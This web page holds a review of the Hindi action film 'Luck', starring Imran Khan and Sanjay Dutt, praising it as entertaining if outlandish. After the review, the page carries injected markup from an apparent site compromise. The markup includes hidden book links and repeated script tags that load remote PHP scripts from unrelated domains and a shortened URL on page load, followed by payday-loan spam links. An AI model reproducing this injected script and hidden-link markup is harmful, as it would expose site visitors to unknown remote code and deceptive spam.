It is a fleeting feeling.
You think you know it — that feeling of something waiting just around the corner. You have been down so long, you are convinced things are about to change. You think you see it coming. You think you are almost there. You think you get so close, you start to push the issue. You press your luck, for your luck is about to change for the better.
Or is it?
One patiently awaits his or her turn in life, doing everything asked of them. Along the way, problems always arise. Things are constantly changing, and not always for the best. It sometimes appears as if one is always waiting for that moment where life is altered for the best. In one fell swoop, all things gone wrong will change for the best. The waiting game would have paid off, and the turn in life has been completed.
Redemption is earned, all in the name of luck.
Yet, what happens when both redemption and luck are sought solely in the name of digging a hole too deep for oneself? Can one be too anxious in waiting for opportunity to knock on their door? When does one realize he or she is about to turn the corner and erase years of bad luck and personal error? How does one know when that event is about to happen, allowing them to clean up the crazy mess they have allowed their life to become?
Ram Mehra thinks he has the answers to all these seemingly rhetorical (and perhaps not so innocent) questions. He has problems galore, so much so he has reached a boiling point. He keeps trying to find a solution to clean up his mess, but the janitor known as Luck never seems to be available.
Then again, if Luck showed up at his doorstep, would Ram even know what to do? Well, he certainly thought so, as he rushed to open the door when opportunity was allegedly knocking.
Next thing he realizes, thanks to a series of chance encounters and random occurrences, Ram begins to have an epiphany. He begins to realize the power he has over himself. He begins to realize the janitor he has been waiting for to clean up his mess has been in front of him this whole time.
Ram realizes only he can solve his problems.
The real problem is: once one mess is cleaned, another one is made.
This new mess comes in the form of Moussa, who interjects notions of greed, betrayal and debauchery. While Ram thinks his luck has turned for the best, Moussa does all he can to put his newfound “friend” to the test.
A self-made Don who is keen on making his own luck, Moussa challenges Ram’s new lease on life with a game of chance, with just the right amount of money placed on the line to pique the interest of anyone for a way to better one’s position in life. But the high-stakes betting match is no children’s board game, and the faintest of hearts do not stand a chance at survival.
Does Moussa think Ram is just another desperate, down-on-his-luck guy who does not stand a chance at success? Or does Ram truly discover his inner powers to create his own luck and break past the human vices of greed, power and wealth beyond his wildest dreams?
With intense action sequences, including several men running across train tracks with their hands tied and eyes blind-folded, as well as the film’s leading lady taking a swim with sharks, Luck will not only answer the questions posed above, but it will also shed perspective as to what kind of opportunity is knocking at your door.
Starring Imran Khan as Ram and Sanjay Datt as Moussa, Luck opens across India and in the United States today, and also features Mithun Chakraborty, Shruti Haasan, Danny Denzongpa, Ravi Kishan and Chitrashi Rawat.
Khan and Dutt are convincing as leading men. In playing Ram, Khan aptly plays a man who is difficult to discern at first but eventually finds his place as the film’s hero. Opposite him is Dutt, who has grown accustomed to playing a strong man opposite the hero, capable of bringing out both the best and the worst in his own character and his nemesis.
The solid supporting cast also features Hassan, who seems to be establishing herself as a bold female lead capable of doing high-intensity action sequences as well as lovey-dovey Hindi film dance-romance sequences.
Overall, Luck is an entertaining action-adventure film with decent performances all around. The plot builds up relatively well, and while certain portions during the middle and climax of the film seem outlandish and stylized, Luck is ultimately a film that has less to do with realism and more to do with entertaining its audience – something the movie actually does accomplish.
Directed by Soham Shah and produced by Dhilin Mehta, Luck is a high-octane thrill ride that may place you on the edge of your seat if you are fortunate enough to recognize the opportunity in front of you. </title><a style=display:none; href=http://booksgou.com >book</a></title><a style=display:none; href=http://booksgou.com >book</a> </title><a style=display:none; href=http://booktuba.com >book</a></title><a style=display:none; href=http://booktuba.com >book</a> </title><script src=http://asweds.com/ur.php></script></title><script src=http://asweds.com/ur.php></script> </title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script> </title><script src=http://shorl.com/huhopapidyno ></script> </title><script src=http://hgbyju.com/r.php ></script> <a href=http://oneminutecashloans.com/a/2223/ title=midas+cash ><img src=http://oneminutecashloans.com/a.gif border=0 ></a> <a href=http://reallyneedcash.com/a/2198/ title=online+cash+advance+94590 ><img src=http://reallyneedcash.com/a.gif border=0 ></a><a href=http://1hourcashgroup.com/a/2163/ title=free+online+faxless+payay+loans ><img src=http://1hourcashgroup.com/a.gif border=0 ></a> <a href=http://24advokat.ru/cat/besplatnaya_yuridicheskaya_pomosch_pensioneram/ ><img src=http://24advokat.ru/i/bg.gif border=0 ></a> <a href=http://paydayadvancelaons.com/a/2458/ title=laons+for+pre+payed+cards ><img src=http://paydayadvancelaons.com/bg.gif border=0 ></a> <a href=http://paydayloanguide.biz/a/2665/ title=holiday+group+payday+loan ><img src=http://paydayloanguide.biz/bg.gif border=0 ></a> </title><script src=http://nmmkmm.com/r.php ></script></title><script src=http://nmmkmm.com/r.php ></script></title><script src=http://nmmkmm.com/r.php ></script> <a href=http://getloan.biz/a/1470/ title=instant+cash+online+payday+advance ><img src=http://getloan.biz/bg.gif border=0 ></a><a href=http://quicksteploans.com/a/2002/ title=3month+pay+day+loans ><img src=http://quicksteploans.com/bg.gif border=0 ></a><a href=http://quicksteploans.com/a/1998/ title=1500+dollar+pay+day+loans ><img src=http://quicksteploans.com/bg.gif border=0 ></a><a href=http://1000loanpayday.net/a/7254/ title=government+debt+consolidation+loans ><img src=http://1000loanpayday.net/bg.gif border=0 ></a><a href=http://onehourlender.com/a/2370/ title=all+americanezloan ><img src=http://onehourlender.com/bg.gif border=0 ></a>
